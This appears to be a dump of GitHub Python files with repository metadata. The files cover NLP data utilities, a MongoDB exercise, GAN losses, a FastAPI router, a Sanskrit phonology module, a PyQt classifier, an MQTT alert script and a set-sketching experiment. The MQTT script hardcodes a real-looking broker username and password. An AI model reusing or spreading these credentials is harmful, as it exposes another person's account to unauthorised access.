test_df.apply(get_start_end('discourse_text'),axis=1)\n test_df['discourse_start'] = test_df['st_ed'].transform(lambda x:x[0])\n test_df['discourse_end'] = test_df['st_ed'].transform(lambda x:x[1])\n test_df['previous_discourse_end'] = test_df.groupby(\"essay_id\")['discourse_end'].transform(lambda x:x.shift(1).fillna(0)).astype(int)\n test_df['st_ed'] = test_df.apply(get_start_end('discourse_text'),axis=1)\n test_df['discourse_start'] = test_df['st_ed'].transform(lambda x:x[0]) #+ test_df['previous_discourse_end']\n test_df['discourse_end'] = test_df['st_ed'].transform(lambda x:x[1]) #+ test_df['previous_discourse_end']\n\n if 'target' in test_df.columns:\n classe_mapper = {'Ineffective':0,\"Adequate\":1,\"Effective\":2}\n test_df['target'] = test_df['discourse_effectiveness'].map(classe_mapper)\n \n else:\n test_df['target'] = 1 \n\n return test_df\n\n\ndef get_text_start_end(txt,s,search_from=0):\n txt = txt[int(search_from):]\n try:\n idx = txt.find(s)\n if idx>=0:\n st=idx\n ed = st+len(s)\n else:\n raise ValueError('Error')\n except: \n res = [(m.start(0), m.end(0)) for m in re.finditer(s, txt)]\n if len(res):\n st,ed = res[0][0],res[0][1]\n else:\n m = SequenceMatcher(None, s,txt).get_opcodes()\n for tag,i1,i2,j1,j2 in m:\n if tag=='replace':\n s = s[:i1]+txt[j1:j2]+s[i2:]\n if tag==\"delete\":\n s = s[:i1]+s[i2:]\n \n res = [(m.start(0), m.end(0)) for m in re.finditer(s,txt)]\n if len(res):\n st,ed = res[0][0],res[0][1]\n else:\n idx = txt.find(s)\n if idx>=0:\n st=idx\n ed = st+len(s)\n else:\n st,ed = 0,0\n return st+search_from,ed+search_from\n\ndef get_start_end(col):\n def search_start_end(row):\n txt = row.essay_text\n search_from = row.previous_discourse_end\n s = row[col]\n # print(search_from)\n return get_text_start_end(txt,s,search_from)\n return search_start_end\n\ndef batch_to_device(batch, device):\n batch_dict = {key: batch[key].to(device) for key in batch}\n return batch_dict\n\n\ndef text_to_words(text):\n word = text.split()\n word_offset = []\n\n start = 0\n for w in word:\n r = text[start:].find(w)\n\n if r==-1:\n raise NotImplementedError\n else:\n start = start+r\n end = start+len(w)\n word_offset.append((start,end))\n start = end\n\n return word, word_offset\n\ndef text_to_sentence(text):\n sentences = re.split(r' *[\\.\\?!\\n][\\'\"\\)\\]]* *', text)\n sentences = [x for x in sentences if x!=\"\"]\n \n sentence_offset = []\n start = 0\n for w in sentences:\n r = text[start:].find(w)\n\n if r==-1:\n raise NotImplementedError\n else:\n start = start+r\n end = start+len(w)\n sentence_offset.append((start,end))\n start = end\n\n return sentences,sentence_offset\n\ndef text_to_paragraph(text):\n sentences = re.split(r' *[\\n][\\'\"\\)\\]]* *', text)\n sentences = [x for x in sentences if x!=\"\"]\n \n sentence_offset = []\n start = 0\n for w in sentences:\n r = text[start:].find(w)\n\n if r==-1:\n raise NotImplementedError\n else:\n start = start+r\n end = start+len(w)\n sentence_offset.append((start,end))\n start = end\n\n return sentences,sentence_offset\n\n\ndef get_span_from_text(text,span_type=\"words\"):\n \n if span_type==\"words\":\n spans,spans_offset = text_to_words(text)\n elif span_type==\"sentences\":\n spans,spans_offset = text_to_sentence(text)\n else:\n spans,spans_offset = text_to_paragraph(text)\n \n return 
spans,spans_offset","repo_name":"amedprof/Feedback-Prize--English-Language-Learning","sub_path":"src/data/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"4569331698","text":"'''\nMeanwhile, in other categories...\n\n\nWe learned in the last exercise that there has been significantly more sharing of physics prizes since World War II: the ratio of the number of laureates who won an unshared prize in physics in or after 1945 to the number of laureates who shared a prize in physics in or after 1945 is approximately 0.13. What is this ratio for prize categories other than physics, chemistry, and medicine?\n\nInstructions\n100 XP\n\n- Save an $elemMatch filter unshared to count laureates with unshared prizes in categories other than (\"not in\") [\"physics\", \"chemistry\", \"medicine\"] in or after 1945.\n-Save an $elemMatch filter shared to count laureates with shared (i.e., \"share\" is not \"1\") prizes in categories other than [\"physics\", \"chemistry\", \"medicine\"] in or after 1945.\n\n'''\n# Save a filter for laureates with unshared prizes\nunshared = {\n \"prizes\": {'$elemMatch': {\n \"category\": {\"$nin\": [\"physics\", \"chemistry\", \"medicine\"]},\n \"share\": \"1\",\n \"year\": {\"$gte\": \"1945\"},\n }}}\n\n# Save a filter for laureates with shared prizes\nshared = {\n \"prizes\": {\"$elemMatch\": {\n \"category\": {\"$nin\": [\"physics\", \"chemistry\", \"medicine\"]},\n \"share\": {\"$ne\": \"1\"},\n \"year\": {\"$gte\": \"1945\"},\n }}}\n\nratio = db.laureates.count_documents(\n unshared) / db.laureates.count_documents(shared)\nprint(ratio)\n","repo_name":"chandrainf/Datacamp","sub_path":"Data Engineer with Python Track/25. Introduction to MongoDB in Python/Chapter/02. Working with Distinct Values and Sets/07-Meanwhile, in other categories....py","file_name":"07-Meanwhile, in other categories....py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"32234424338","text":"import torch\nfrom torch.nn.functional import binary_cross_entropy_with_logits as bce_loss\nfrom torch.autograd import Variable\n#http://seba1511.net/tutorials/beginner/examples_autograd/two_layer_net_autograd.html\ndtype = torch.FloatTensor\n\ndef discriminator_loss(logits_real, logits_fake):\n \"\"\"\n Computes the discriminator loss.\n \n You should use the stable torch.nn.functional.binary_cross_entropy_with_logits \n loss rather than using a separate softmax function followed by the binary cross\n entropy loss.\n \n Inputs:\n - logits_real: PyTorch Tensor of shape (N,) giving scores for the real data.\n - logits_fake: PyTorch Tensor of shape (N,) giving scores for the fake data.\n \n Returns:\n - loss: PyTorch Tensor containing (scalar) the loss for the discriminator.\n \"\"\"\n \n loss = None\n \n ####################################\n # YOUR CODE HERE #\n ####################################\n \n \n ########## END ##########\n # function provides the calculation of both log components in the objective function (i.e. 
log(D(x)) and log(1−D(G(z)))), generated, real\n #https://pytorch.org/docs/stable/nn.functional.html\n# print(logits_real)\n# print(\"next: \", logits_fake)\n N = logits_real.size()\n target_real = Variable(torch.ones(N)).type(dtype).cuda()\n target_generate = Variable(torch.zeros(N)).type(dtype).cuda()\n real = bce_loss(logits_real, target_real).cuda()\n generated = bce_loss(logits_fake, target_generate).cuda()\n loss = real + generated\n return loss\n\ndef generator_loss(logits_fake):\n \"\"\"\n Computes the generator loss.\n \n You should use the stable torch.nn.functional.binary_cross_entropy_with_logits \n loss rather than using a separate softmax function followed by the binary cross\n entropy loss.\n\n Inputs:\n - logits_fake: PyTorch Tensor of shape (N,) giving scores for the fake data.\n \n Returns:\n - loss: PyTorch Tensor containing the (scalar) loss for the generator.\n \"\"\"\n \n loss = None\n \n ####################################\n # YOUR CODE HERE #\n ####################################\n \n \n ########## END ##########\n N = logits_fake.size()\n target = Variable(torch.ones(N)).type(dtype).cuda()\n loss = bce_loss(logits_fake, target)\n\n return loss\n\n\ndef ls_discriminator_loss(scores_real, scores_fake):\n \"\"\"\n Compute the Least-Squares GAN loss for the discriminator.\n \n Inputs:\n - scores_real: PyTorch Tensor of shape (N,) giving scores for the real data.\n - scores_fake: PyTorch Tensor of shape (N,) giving scores for the fake data.\n \n Outputs:\n - loss: A PyTorch Tensor containing the loss.\n \"\"\"\n \n loss = None\n \n ####################################\n # YOUR CODE HERE #\n ####################################\n #https://wiseodd.github.io/techblog/2017/03/02/least-squares-gan/\n N = scores_real.size()\n target = Variable(torch.ones(N)).type(dtype).cuda()\n real = (1/2) * torch.mean( torch.pow(scores_real - target , 2) )\n generated = (1/2) * torch.mean( torch.pow(scores_fake , 2) )\n loss = real + generated\n ########## END ##########\n \n return loss\n\ndef ls_generator_loss(scores_fake):\n \"\"\"\n Computes the Least-Squares GAN loss for the generator.\n \n Inputs:\n - scores_fake: PyTorch Tensor of shape (N,) giving scores for the fake data.\n \n Outputs:\n - loss: A PyTorch Tensor containing the loss.\n \"\"\"\n \n loss = None\n \n ####################################\n # YOUR CODE HERE #\n ####################################\n N = scores_fake.size()\n target = Variable(torch.ones(N)).type(dtype).cuda()\n \n loss = (1/2) * torch.mean( torch.pow(scores_fake - target , 2) )\n \n ########## END ##########\n \n return loss\n","repo_name":"wlyu1208/UIUC","sub_path":"cs498_deep_learning/assignment4/wlyu2_mp4_code/gan/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"6119958137","text":"import unittest\nfrom SPT.spt import Voice\nfrom Functions.time import Time\nfrom datetime import datetime\n\n\nclass test_Time(unittest.TestCase, Time):\n def test_Hour(self, voices=Voice()):\n # testing if the method works\n self.hour = datetime.now()\n voices.speak_en(\"Sir, the time is\" + str(self.hour))\n return self.hour\n\n def test_hour_Equal(self):\n self.hour = datetime.now()\n expected = self.hour\n result = expected\n self.assertEqual(expected, result)\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"Brabitt/Virtual_Assistant","sub_path":"Test_Functions/test_time.py","file_name":"test_time.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74697139640","text":"from typing import List\n\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import update, delete, asc\n\nfrom fastapi import Depends, APIRouter, HTTPException, Response\nfrom http import HTTPStatus\nfrom provisioning.connection_db import get_db\n\nfrom provisioning.users_db import Users\nfrom models.users_models import UsersInput, UsersResponse\n\nrouter = APIRouter()\n\n@router.get('/users/find_all/', response_model=List[UsersResponse])\nasync def find_all_users(db: Session = Depends(get_db)):\n users_in_db = db.query(Users).\\\n order_by(asc(Users.name)).\\\n all()\n if users_in_db == []:\n return Response(status_code=HTTPStatus.NO_CONTENT.value)\n return users_in_db\n \n\n@router.get('/users/find_one/{personal_id}', response_model=UsersResponse)\nasync def find_one_user(id: int, db: Session = Depends(get_db)):\n user_in_db = db.query(Users).get(id)\n if user_in_db == None:\n raise HTTPException(status_code=404, \n detail=\"User does not exist.\")\n return user_in_db\n\n\n@router.get('/users/find_by_email/{email}', response_model=UsersResponse)\nasync def find_by_email(email: str, db: Session = Depends(get_db)):\n user_in_db = db.query(Users).\\\n filter(Users.email == email).\\\n first()\n if user_in_db == None:\n raise HTTPException(status_code=404, \n detail=\"Email user does not exist.\")\n return user_in_db\n\n\n@router.post('/users/insert/', response_model=UsersResponse)\nasync def insert_user(user_in: UsersInput, db: Session = Depends(get_db)):\n user = Users(**user_in.dict())\n user_in_db = db.query(Users).get(user.id)\n if user_in_db != None:\n raise HTTPException(status_code=409, \n detail=\"The user is yet in the database.\")\n db.add( user )\n db.commit()\n db.refresh( user )\n return user\n\n","repo_name":"lgarzon09/connek_back","sub_path":"routers/users_router.py","file_name":"users_router.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9373034318","text":"import matplotlib.pyplot as plt\nfrom pylab import *\nx=linspace(0,5,10)\ny=x**2\n\nfig=plt.figure()\n\naxes=fig.add_axes([0.1,0.1,0.8,0.8])\naxes.plot(x,y,'r')\n\nplt.show()","repo_name":"wlccomeon/machine","sub_path":"Ch18/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4565315525","text":"# -*- coding: utf-8 -*-\n\"\"\"\n vyakarana.sounds\n ~~~~~~~~~~~~~~~~\n\n Classes for working with various sounds.\n\n :license: MIT and BSD\n\"\"\"\n\n\ndef memoize(c):\n cache = {}\n get_key = lambda a, kw: tuple(a) + (frozenset(kw.items()),)\n\n def memoized(*a, **kw):\n key = get_key(a, kw)\n if key not in cache:\n cache[key] = c(*a, **kw)\n return cache[key]\n return memoized\n\n\n@memoize\nclass Sound(object):\n\n \"\"\"A Sanskrit sound.\n\n These sounds can be transformed in ways defined by the grammar.\n\n :param value: the Sound's value\n \"\"\"\n\n #: This organizes sounds by their point of articulation.\n ASYA = [\n # kaṇṭha\n set('aAkKgGNh'),\n # tālu\n set('iIcCjJYyS'),\n # mūrdhan\n set('fFwWqQRrz'),\n # danta\n set('xXtTdDnls'),\n # oṣṭha\n set('uUpPbBmv'),\n # kaṇṭha-tālu\n 
set('eE'),\n # kaṇṭha-oṣṭha\n set('oO'),\n # pure nasal\n set('M')\n ]\n\n #: This organizes sounds by their articulatory effort.\n PRAYATNA = [\n # spṛṣṭa\n set('kKgGNcCjJYwWqQRtTdDnpPbBmh'),\n # īṣatspṛṣṭa\n set('yrlv'),\n # śar\n set('Szs'),\n # vowels\n set('aAiIuUfFxeEoO'),\n ]\n\n #: This organizes sounds by their nasality.\n NASIKA = [\n # nasal\n set('NYRnmM'),\n # non-nasal\n set('aAiIuUfFxeEoOkKgGcCjJwWQQtTdDpPbByrlvSzsh'),\n ]\n\n #: This organizes sounds by their \"voice.\"\n GHOSA = [\n # ghoṣavat (voiced)\n set('aAiIuUfFxXeEoOgGNjJYqQRdDnbBmyrlvh'),\n # aghoṣa (unvoiced)\n set('kKcCwWtTpPSzs'),\n ]\n\n #: This organizes sounds by their aspiration.\n PRANA = [\n # mahāprāṇa (aspirated)\n set('KGCJWQTDPBh'),\n # alpaprāṇa (unaspirated)\n set('aAiIuUfFxXeEoOkgNcjYwqRtdnpbmyrlvSzs'),\n ]\n\n def __init__(self, value):\n self.value = value\n\n def asavarna(self, other):\n \"\"\"Returns the sounds that are not savarna to this one.\n\n One subtle point here is that the 'savarna' and 'asavarna' are\n both undefined between consonants and vowels.\n\n :param other:\n \"\"\"\n ac = Pratyahara('ac')\n same_ac = self.value in ac and other in ac\n return same_ac and other not in self.savarna_set\n\n def closest(self, items):\n \"\"\"Return the phonetically closest value. If no close value\n exists, return `self.value`.\n\n :param items: a list of letters\n \"\"\"\n best = self.value\n best_score = 0\n\n self_names = self.names()\n for x in items:\n score = len(Sound(x).names().intersection(self_names))\n if score > best_score:\n best, best_score = x, score\n return best\n\n def names(self):\n \"\"\"Get the various designations that apply to this sound. This\n is used to determine how similar two sounds are to each other.\n \"\"\"\n try:\n return self._names\n except AttributeError:\n pass\n\n self._names = set()\n categories = [self.ASYA, self.PRAYATNA, self.NASIKA, self.GHOSA,\n self.PRANA]\n for i, category in enumerate(categories):\n for j, group in enumerate(category):\n if self.value in group:\n self._names.add('%s_%s' % (i, j))\n\n return self._names\n\n def savarna(self, other):\n \"\"\"\n\n :param other: some sound\n \"\"\"\n return other in self.savarna_set\n\n @property\n def savarna_set(self):\n \"\"\"Return the sounds that are savarna to this one. 
The 'savarna'\n relation is defined by the following rules:\n\n 1.1.9 tulyAsyaprayatnaM savarNam\n 1.1.10 nAjjhalau\n \"\"\"\n s = self.value\n a = p = None\n\n for a in self.ASYA:\n if s in a:\n break\n for p in self.PRAYATNA:\n if s in p:\n break\n if a is None:\n a = p\n elif p is None:\n p = a\n\n results = a.intersection(p)\n is_ac = s in Pratyahara('ac')\n\n # 1.1.10 na ac-halau\n return set([x for x in results if (x in Pratyahara('ac')) == is_ac])\n\n\nclass SoundCollection(object):\n\n def __init__(self, *a, **kw):\n raise NotImplementedError\n\n def __contains__(self, item):\n \"\"\"\n :param item: some sound\n \"\"\"\n return item in self.values\n\n def __iter__(self):\n return iter(self.values)\n\n def __len__(self):\n return len(self.values)\n\n def __repr__(self):\n return \"<%s('%s')>\" % (self.__class__.__name__, self.name)\n\n\n@memoize\nclass Sounds(SoundCollection):\n\n \"\"\"A shorthand for grouping Sanskrit sounds.\n\n :param phrase: a group of designations\n \"\"\"\n\n def __init__(self, phrase):\n self.name = phrase\n if isinstance(phrase, basestring):\n items = phrase.split()\n else:\n items = phrase\n\n v = self.values = set()\n for item in items:\n\n first, last = (item[0], item[-1])\n simple_vowel = len(item) == 1 and item in Pratyahara('ak')\n\n # 1.1.69 aNudit savarNasya cApratyayaH\n if last == 'u' or simple_vowel:\n v.update(Sound(first).savarna_set)\n # 1.1.70 taparas tatkAlasya\n elif last == 't':\n v.update([first])\n # Generic letter\n elif len(item) == 1:\n v.update(item)\n # Pratyahara\n else:\n v.update(Pratyahara(item).values)\n\n\n@memoize\nclass Pratyahara(SoundCollection):\n\n \"\"\"A shorthand for grouping Sanskrit sounds.\n\n The various pratyaharas are defined in the Shiva Sutras, which\n precede the Ashtadhyayi proper.\n\n :param value: the pratyahara itself, e.g. 'hal', 'ak', 'Jal'\n :param second_R: ``True`` iff we should use the second 'R' as our\n boundary. 
Since pratyaharas formed with this letter\n are usually ambiguous, we have to be explicit here.\n \"\"\"\n\n rules = [\n ('aAiIuU', 'R'),\n ('fFxX', 'k'),\n ('eo', 'N'),\n ('EO', 'c'),\n ('hyvr', 'w'),\n ('l', 'R'),\n ('YmNRn', 'm'),\n ('JB', 'Y'),\n ('GQD', 'z'),\n ('jbgqd', 'S'),\n ('KPCWTcwt', 'v'),\n ('kp', 'y'),\n ('Szs', 'r'),\n ('h', 'l'),\n ]\n\n def __init__(self, name, second_R=False):\n first = name[0]\n limit = name[-1]\n found_first = False\n\n self.name = name\n self.values = set([first])\n\n for items, it in self.rules:\n if found_first:\n self.values.update(items)\n elif first in items:\n self.values.update(items.partition(first)[-1])\n found_first = True\n if found_first and it == limit:\n if second_R:\n second_R = False\n else:\n break\n","repo_name":"sanskrit/vyakarana","sub_path":"vyakarana/sounds.py","file_name":"sounds.py","file_ext":"py","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"2348758370","text":"import paho.mqtt.client as mqtt\nimport time\n\ntopic = 'Test/#'\nlista_valori = []\nprag = 25\ndepasiri_maxime = 5\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connect with Code: \", str(rc))\n #Subscribe Topic:\n client.subscribe(topic)\n\ndef on_message(client, userdata, msg):\n print(str(msg.payload)[2:-1])\n lista_valori.append(float(str(msg.payload)[2:-1]))\n #print(lista_valori)\n nr_depasiri = 0\n for v in lista_valori:\n if v > prag:\n nr_depasiri += 1\n if nr_depasiri >= depasiri_maxime:\n print(\"ALERT!!!\")\n\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"farmer.cloudmqtt.com\", 16697, 60)\nclient.username_pw_set(\"yssrliya\", \"8a6l_tOwTMX9\")\nclient.loop_forever()\n","repo_name":"marinabarbu/MQTT_Grafana_OpenGate","sub_path":"alert_for_temp.py","file_name":"alert_for_temp.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25970414932","text":"import os,sys\nimport h5py\nimport numpy as np\nimport networkx as nx\nimport neuroglancer\n\nfrom T_util import readh5,ngLayer,relabel\n\nDo='file:///var/www/html/dataset/jwr15_df/'\n\n\nip='localhost'\npp=10000+int(np.random.random()*10000)\n\n\nneuroglancer.set_server_bind_address(bind_address=ip,bind_port=pp)\nviewer=neuroglancer.Viewer()\n\n\n\n\n\n\nres = [128,256,120]\nbfs= 'bfs'\nedgTh = [40,1] # threshold\n\n# modify these two for the skeleton you want to visualize\nseg = readh5('/home/xingyu/PycharmProjects/skeleton/neuron/cell9_d.h5').astype(np.uint16)\nSKEL_FOLDER = '/home/xingyu/PycharmProjects/skeleton/outputs/9'\n\n\n\nall_nodes = readh5(os.path.join(SKEL_FOLDER,'new_node_pos.h5'))\n\nreduced_nodes = readh5(os.path.join(SKEL_FOLDER,'graph-bfs-%d-10.h5'%(edgTh[0])))\n\n\nGraph = nx.read_gpickle(os.path.join(SKEL_FOLDER,'graph-%s.obj'%(bfs)))\n\nnew_G = nx.read_gpickle(os.path.join(SKEL_FOLDER,'new_graph.obj'))\nedge_list = new_G.edges()\n\n\n\nwith viewer.txn() as s:\n s.layers.append(name=\"den\",layer=ngLayer(seg,res))\n s.layers['den'].segments.update(range(1,30))\n s.layers['den'].visible = True\n\n s.layers.append(name=\"nodes\",layer=ngLayer(reduced_nodes,res))\n s.layers['nodes'].segments.update(range(1,3))\n s.layers['nodes'].visible = True\n\n s.layers.append(name='edges',layer=neuroglancer.AnnotationLayer(voxelSize=res))\n annotations = s.layers[-1].annotations\n line_id = 1\n for edge in edge_list:\n annotations.append(\n 
neuroglancer.LineAnnotation(\n id=line_id,\n point_a=[all_nodes[edge[0]][2],all_nodes[edge[0]][1],all_nodes[edge[0]][0]],\n point_b=[all_nodes[edge[1]][2],all_nodes[edge[1]][1],all_nodes[edge[1]][0]]\n )\n )\n\n\n line_id += 1\n\n\n\nprint(viewer)\n","repo_name":"charlotte12l/NeuronShapeAnalysis","sub_path":"vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70771727162","text":"import sys\nfrom PyQt5 import QtCore, QtWidgets, uic\n\nimport pandas as pd\nimport sys\nfrom PyQt5 import QtWidgets, uic\nimport numpy as np\nfrom sklearn import preprocessing\n# import matplotlib.pyplot as plt\n# plt.rc(\"font\", size=14)\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom imblearn.over_sampling import SMOTE\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\n\nclass PageMain(QtWidgets.QMainWindow):\n\n def predict(self, WS, CC, RH, MT, WD):\n data = pd.read_csv('dataAI.csv', header=0)\n data = data.dropna()\n\n data_final = data\n data_final.columns.values\n\n X = data_final.loc[:, data_final.columns != 'AQI']\n y = data_final.loc[:, data_final.columns == 'AQI']\n\n\n os = SMOTE(random_state=0)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n columns = X_train.columns\n os_data_X, os_data_y = os.fit_resample(X_train, y_train)\n os_data_X = pd.DataFrame(data=os_data_X, columns=columns)\n os_data_y = pd.DataFrame(data=os_data_y, columns=['AQI'])\n\n cols = ['WindSpeed', 'CloudCover',\n 'RelativeHumidity', 'Minimum Temperature', 'Wind Direction']\n X = os_data_X[cols]\n y = os_data_y['AQI']\n\n\n logit_model = sm.Logit(y, X)\n result = logit_model.fit()\n\n logit_model = sm.Logit(y, X)\n result = logit_model.fit()\n\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n logreg = LogisticRegression()\n logreg.fit(X_train, y_train)\n\n\n\n X_test1 = pd.DataFrame([[(WS), (CC), (RH), (MT), (WD)]],\n columns=['WindSpeed', 'CloudCover', 'RelativeHumidity', 'Minimum Temperature',\n 'Wind Direction'])\n y_pred = logreg.predict(X_test1)\n\n\n if (y_pred == 1):\n return 1\n return 0\n\n def __init__(self):\n super(PageMain, self).__init__()\n uic.loadUi(\"AI.ui\", self)\n\n self.btn.clicked.connect(self.setText)\n\n self.show()\n\n def setText(self):\n a = 0.0\n b = 0.0\n c = 0.0\n d = 0.0\n e = 0.0\n\n WS = self.ws.text()\n CC = self.cc.text()\n RH = self.rh.text()\n MT = self.mt.text()\n WD = self.wd.text()\n\n if (WS == \"\" or CC == \"\" or RH == \"\" or MT == \"\" or WD == \"\"):\n QtWidgets.QMessageBox.warning(self, 'Thông báo', 'KHÔNG ĐƯỢC BỎ TRỐNG!')\n return\n else:\n if (WS.isdigit() == False) or (CC.isdigit() == False) or (RH.isdigit() == False) or (MT.isdigit() == False) or (WD.isdigit() == False):\n QtWidgets.QMessageBox.warning(self, 'Thông báo', 'NHẬP SAI VUI LÒNG NHẬP LẠI!')\n return\n\n a = a + float(WS)\n b = b + float(CC)\n c = c + float(RH)\n d = d + float(MT)\n e = e + float(WD)\n\n if (0 <= a <= 100) and (0 <= b <= 100) and (0 <= c <= 100) and (0 <= d <= 100) and (0 <= e <= 100):\n data = self.predict(a, b, c, d, e)\n\n if data == 0:\n txt = \"KHÔNG Ô NHIỄM\"\n else:\n txt = \"Ô NHIỄM\"\n\n self.lineEdit.setText(txt)\n else:\n QtWidgets.QMessageBox.warning(self, 'Thông báo', 'NHẬP SAI VUI LÒNG NHẬP LẠI!')\n\n\n\napp = 
QtWidgets.QApplication(sys.argv)\nwindow = PageMain()\nwindow.show()\nsys.exit(app.exec_())","repo_name":"TrongHung21/AMLAPF","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"718198731","text":"import pathlib\nimport yaml\nfrom dotmap import DotMap\n\n\nBASE_DIR = pathlib.Path(__file__).parent.parent\nSTATIC_DIR = BASE_DIR/'static'\nTEMPLATES_DIR = STATIC_DIR/'templates'\nconfig_path = BASE_DIR/'config.yaml'\n\n\ndef get_config(path):\n with open(path) as file:\n config = yaml.safe_load(file)\n return config\n\n\nconfig = DotMap(get_config(config_path))\n","repo_name":"rozumalex/notify","sub_path":"notify/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42648207805","text":"from scripts.entities.player import Player\n\n\nclass PlayerFighter:\n\n def __init__(self, player: Player, screen, strength, speed, attack_speed, hp, defense, stamina):\n\n self.player = player\n self.screen = screen\n self.strength = strength\n self.speed = speed\n self.attack_speed = attack_speed\n self.hp = hp\n self.defense = defense\n self.stamina = stamina\n\n self.equipped = {\n \"chestplate\": None,\n \"leggings\": None,\n \"boots\": None,\n \"weapon\": None,\n \"shield\": None,\n \"potions\": []\n }\n\n\n def use_potion(self, potion_index):\n # use specified potion\n if self.equipments[\"potions\"][potion_index]:\n self.equipments[\"potions\"][potion_index].use()\n self.equipments[\"potions\"][potion_index] = None\n\n def win(self, prize_money):\n # increase player money and popularity for winning\n self.player.money += prize_money\n self.player.popularity += 1\n self.player.wins += 1\n\n def lose(self):\n # decrease player popularity for losing\n self.player.popularity -= 1\n\n","repo_name":"AngelFireLA/Projet-Gladiateur","sub_path":"scripts/entities/player_fighter.py","file_name":"player_fighter.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3449745692","text":"### Written by Ian Macleod (idm2114) and Imanol Uribe (iu2155) \n### for COMS 4342 HW2 Q2B \n\nimport random\nimport copy \nimport math\nimport collections\n\n\n# scale factor by which we increase size of arrays for sketches\n# each of the log_n sketches has size O(k) = 100k\nC = 100\n\ndef universal_hash(n, k, numHashFunctions):\n # smallest prime > 1000000 = 10000019\n p = 10000019\n H = []\n for i in range(numHashFunctions):\n a = random.randint(0,p-1)\n if a % 2 == 0:\n a += 1\n b = random.randint(0,p-1)\n H.append([a,b,p])\n return H\n\ndef eval_h(itm, hash_function, k):\n a = hash_function[0]\n b = hash_function[1]\n p = hash_function[2]\n return int(int((a * itm + b) % p) % (C*k))\n\n## creating sets with symmetric difference of size k and size n + k/2\ndef generate_sets(n,common,k):\n Alice = set() \n\n target_different = set()\n\n # init two sets with common elements\n while(len(Alice) < common):\n tmp = random.randint(1,n)\n Alice.add(tmp)\n\n Bob = copy.copy(Alice)\n\n for j in range(k):\n if j % 2 == 0 and j > 1:\n tmp = random.randint(1,n)\n while tmp in Bob or tmp in Alice:\n tmp = random.randint(1,n)\n Alice.add(tmp)\n target_different.add(tmp)\n else:\n tmp = random.randint(1,n)\n while tmp in Bob or tmp in Alice:\n tmp = random.randint(1,n)\n 
Bob.add(tmp)\n target_different.add(tmp)\n\n return list(Alice), list(Bob), list(target_different)\n\ndef generate_sketches(Alice, Bob, H, k):\n '''\n input: Alice's set, \n Bob's set, \n hash function family H, \n symmetric difference cardinality |A \\Delta B| = k\n '''\n a_sketch = []\n b_sketch = []\n # for each of the hash functions\n for i in range(len(H)):\n current_hash = H[i]\n a_curr = [ 0 for x in range(C * k) ]\n b_curr = [ 0 for x in range(C * k) ]\n for itm in Alice:\n a_curr[eval_h(itm, current_hash, k)] += itm\n for itm in Bob:\n b_curr[eval_h(itm, current_hash, k)] += itm\n a_sketch.append(a_curr)\n b_sketch.append(b_curr)\n return a_sketch, b_sketch\n\ndef recovery(a_sketch, b_sketch, k):\n stream = []\n for i in range(len(a_sketch)):\n diff = [ a_sketch[i][j] - b_sketch[i][j] for j in range(len(a_sketch[i])) ] \n for itm in diff:\n if itm != 0:\n stream.append(abs(itm))\n \n ## getting top k elements in stream\n c = collections.Counter(stream)\n return [ x[0] for x in c.most_common(k) ]\n\nif __name__=='__main__':\n success_count = 0\n num_trials = 100\n for i in range(num_trials):\n n = 100000000\n common = 10000\n k = 500\n alice, bob, target_different = generate_sets(n,common,k)\n H = universal_hash(n, k, math.floor(math.log2(n)))\n a_sketch, b_sketch = generate_sketches(alice, bob, H, k)\n estimated_different = recovery(a_sketch, b_sketch, k)\n if set(estimated_different) == set(target_different):\n success_count+=1\n print(\"Summary statistics:\")\n print(f\"num trials = {num_trials}\\nAlice and Bob set size = {common+int(k/2)}\\n|symmetric difference| = {k}\\nUniverse=(1,...,{n})\")\n print(f\"Success rate is {100 * success_count / num_trials}%\")\n\n","repo_name":"idm2114/andoni_hw2","sub_path":"hw2partb.py","file_name":"hw2partb.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71215283321","text":"from src.modules.get_answers.app.get_answers_controller import GetAnswersController\nfrom src.modules.get_answers.app.get_answers_usecase import GetAnswersUsecase\nfrom src.shared.environments import Environments\nfrom 